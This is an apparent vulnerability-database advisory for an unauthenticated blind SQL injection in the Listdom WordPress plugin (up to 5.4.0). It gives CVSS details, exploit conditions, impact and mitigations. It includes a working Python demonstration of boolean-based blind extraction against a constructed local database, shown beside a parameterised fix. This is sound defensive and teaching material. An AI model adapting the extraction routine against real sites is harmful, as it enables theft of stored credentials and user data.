HarborGuard Database

CVE-2026-54819 | Severity: CRITICAL | CNA: Patchstack

CVE-2026-54819: WordPress Listdom plugin <= 5.4.0 - SQL Injection vulnerability

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webilia Inc. Listdom allows Blind SQL Injection. This issue affects Listdom: from n/a through 5.4.0.

Metrics

CVSS v3.1: 9.3
Severity: CRITICAL
Fixed in: no fixed version published yet
Affected products: 1


HarborGuard Analysis

Synopsis

The Listdom WordPress plugin, in versions up to and including 5.4.0, contains a SQL injection flaw that is reachable over the network without authentication. An attacker who can send HTTP requests to a site running the plugin can inject SQL into a query the plugin builds from request input. The injection is blind: query results are not echoed in the response, so the attacker infers database contents from conditional differences in the response or from timing, one yes/no answer per request. Successful exploitation discloses data stored in the WordPress database (confidentiality High in the CVSS vector) and can partially degrade availability (Availability Low); the vector records no integrity impact. HarborGuard is tracking this advisory and will make a patched-image rebuild available as soon as an upstream fix is published.
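The conditional-response inference described above, as an added Python illustration that is not code from the Listdom plugin, from Webilia Inc., or from HarborGuard. The advisory does not identify the injectable parameter, so a constructed SQLite-backed listing search (the tables, columns and the `api_key` secret are all hypothetical) stands in for a WordPress query built by string concatenation, beside the parameterised form that closes the hole. The oracle learns only whether the search returned rows, which is all a boolean-based blind injection needs:

```python
"""Boolean-based blind SQL injection against a constructed stand-in.

Added illustration, not Listdom's or HarborGuard's code. The advisory does
not say which plugin parameter is injectable, so a small SQLite-backed
"listing search" (hypothetical tables, columns and secret) plays the role
of a WordPress query built by string concatenation, next to the
parameterised version that fixes it.
"""
import sqlite3

SECRET = "s3cr3t"  # hypothetical value the attacker wants to read


def make_db() -> sqlite3.Connection:
    """Constructed sample database: listings plus an options table with a secret."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, category TEXT);
        INSERT INTO listings VALUES (1, 'Cafe Luna', 'food'), (2, 'Pine Hotel', 'lodging');
        CREATE TABLE options (name TEXT, value TEXT);
        """
    )
    con.execute("INSERT INTO options VALUES (?, ?)", ("api_key", SECRET))
    return con


def search_vulnerable(con: sqlite3.Connection, category: str) -> list[str]:
    """Vulnerable pattern: request input is concatenated into the SQL text."""
    sql = "SELECT title FROM listings WHERE category = '" + category + "'"
    return [row[0] for row in con.execute(sql)]


def search_fixed(con: sqlite3.Connection, category: str) -> list[str]:
    """Fixed pattern: a bound parameter can never change the query structure."""
    sql = "SELECT title FROM listings WHERE category = ?"
    return [row[0] for row in con.execute(sql, (category,))]


def oracle(search, con: sqlite3.Connection, condition: str) -> bool:
    """Ask one yes/no question: does the search still return rows when
    `condition` is injected?  A matching category ('food') is kept so the
    answer depends only on the condition; '-- ' comments out the trailing quote."""
    payload = "food' AND (" + condition + ") -- "
    try:
        return len(search(con, payload)) > 0
    except sqlite3.Error:
        return False


def extract_secret(search, con: sqlite3.Connection, max_len: int = 16) -> str:
    """Recover options.value for 'api_key' one character at a time from
    yes/no answers, binary-searching the code point of each character."""
    target = "(SELECT value FROM options WHERE name = 'api_key')"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(search, con, f"length({target}) >= {pos}"):
            break  # past the end of the secret, or the oracle never answers yes
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(search, con, f"unicode(substr({target}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", repr(extract_secret(search_vulnerable, db)))
    print("fixed:     ", repr(extract_secret(search_fixed, db)))
```

Against `search_vulnerable` the extractor recovers the secret with roughly seven requests per character plus one length check; against `search_fixed` the same payload is only an unmatched category string, so the oracle never answers yes and nothing is recovered. In a WordPress plugin the equivalent of `search_fixed` is building the query through `$wpdb->prepare()` placeholders instead of interpolating request values into the SQL string.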

HarborGuard Coverage

Detection: Available

Detection for CVE-2026-54819 is active in every HarborGuard environment. The CVE is matched against customer images within minutes of ingestion from upstream feeds (Patchstack among them), including custom-built images that bundle the Listdom plugin. Scanning covers registry images as well as images evaluated inline during CI/CD pipeline runs.

Triage: Available

HarborGuard scores this CVE at its published CVSS v3.1 rating of 9.3 (Critical) and weights that score against each customer environment's compliance policy to set escalation priority. Triage routing sends findings to the owning team's inbox in each customer organization according to configured ownership rules.

Patch: Pending upstream

No upstream fix version has been published for this CVE. HarborGuard re-checks the advisory every ingest cycle and will make a patched-image rebuild available as soon as Webilia Inc. ships a remediated release. In the interim, compensating controls such as network-policy isolation of affected workloads are surfaced as recommended actions in the HarborGuard findings interface.

Exploit Conditions

  • Network reachability: Required

    The vulnerable plugin endpoint is exposed over the network (AV:N); an attacker must be able to reach the WordPress installation over HTTP or HTTPS to deliver the payload.

  • Authentication: Not required

    No account or session credential is needed (PR:N); the injection point accepts unauthenticated requests.

  • Victim interaction: Not required

    The attack is entirely server-side (UI:N) and needs no action from any user or administrator of the affected site.

  • Attack complexity: Low

    Exploitation is reliable and condition-free (AC:L); no race condition or environment-specific prerequisite applies beyond network access to the target. Blind extraction is slower than direct output, since each inferred answer costs at least one request, but it is fully automatable.

Blast Radius

  • An attacker can read rows from the WordPress database that the plugin's database user is permitted to query: user records including hashed passwords and email addresses, session tokens stored in user metadata, and any customer or listing records the plugin stores.
  • The scope is Changed (S:C in the CVSS vector), so the vector treats the impact as crossing the vulnerable component's boundary into the WordPress database behind it. Whether exposure extends to other schemas or services on the same database server depends on the grants held by the WordPress database user; a user scoped to its own database confines the read to that site's data, which is the check worth making before accepting the wider reading.
  • Availability is partially impaired (A:L); resource-intensive blind injection queries, issued at the volume blind extraction requires, can degrade database performance and cause intermittent service disruption for legitimate site visitors.

How HarborGuard Handles This

Detection for this critical SQL injection is active and matched against all customer images that include the Listdom plugin, with results surfaced in the findings dashboard immediately after ingestion. No upstream patch exists as of publication (2026-06-17), so HarborGuard monitors the Patchstack advisory on every ingest cycle; when a fix version is released it will make a patched-image rebuild available and, for customers with auto-remediation enabled, trigger a rebuild, run the regression suite, and open a PR against affected workloads. In the interim, HarborGuard surfaces compensating-control recommendations: network-policy isolation to restrict public HTTP access to the affected WordPress endpoints, and egress filtering at the database tier to limit the blast radius of a successful injection. Where compliance policy permits, these recommendations can be applied as automated network-policy patches without waiting for an application-level fix. None of these controls removes the injection itself; updating the plugin once a fixed release exists remains the only complete remediation.

Affected packages
  • Webilia Inc. / Listdom: ≤ 5.4.0
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L